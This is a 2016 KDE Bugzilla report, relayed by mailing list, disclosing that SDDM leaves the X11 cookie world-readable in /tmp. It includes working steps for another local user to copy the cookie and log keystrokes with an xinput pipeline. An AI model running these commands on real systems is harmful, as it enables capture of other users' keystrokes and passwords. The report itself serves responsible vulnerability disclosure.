[www.kde.org] [Bug 363140] New: World-readable X11 Cookie, easy key logger

David Rumley via KDE Bugzilla bugzilla_noreply at kde.org
Mon May 16 15:55:02 UTC 2016


            Bug ID: 363140
           Summary: World-readable X11 Cookie, easy key logger
           Product: www.kde.org
           Version: unspecified
          Platform: Archlinux Packages
                OS: Linux
            Status: UNCONFIRMED
          Severity: normal
          Priority: NOR
         Component: general
          Assignee: kde-www at kde.org
          Reporter: Davidl.Rumley at gmail.com

After logging in as any user, you are able to get the X11 cookie and start a
key logger. This has been tested on a F23 system with KDE / SDDM (with current
patches) and a Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1). 

You are able to easily get the X11 cookie.
$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8  .Xauthority

$ sha256sum /tmp/xauth-1000-_0

The cookie is world-readable, even if you change the permissions to the cookie,
after a reboot the changes are gone.
$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0

I have another user that I log via the text console, after that you just need
to start the typical X11 keylogger.
$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1
xinput test

Reproducible: Always

Steps to Reproduce:
1. Login via the text console on any user.
2. Copy the X11 cookie over to .Xauthority file for the user you just logged
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1
xinput test

Actual Results:  
After running the commands listed in "Steps to Reproduce" section, all the
keyboard pushes are printed to the text console.

Expected Results:  
The X11 cookie should not be world-readable.

You are receiving this mail because:
You are the assignee for the bug.

More information about the kde-www mailing list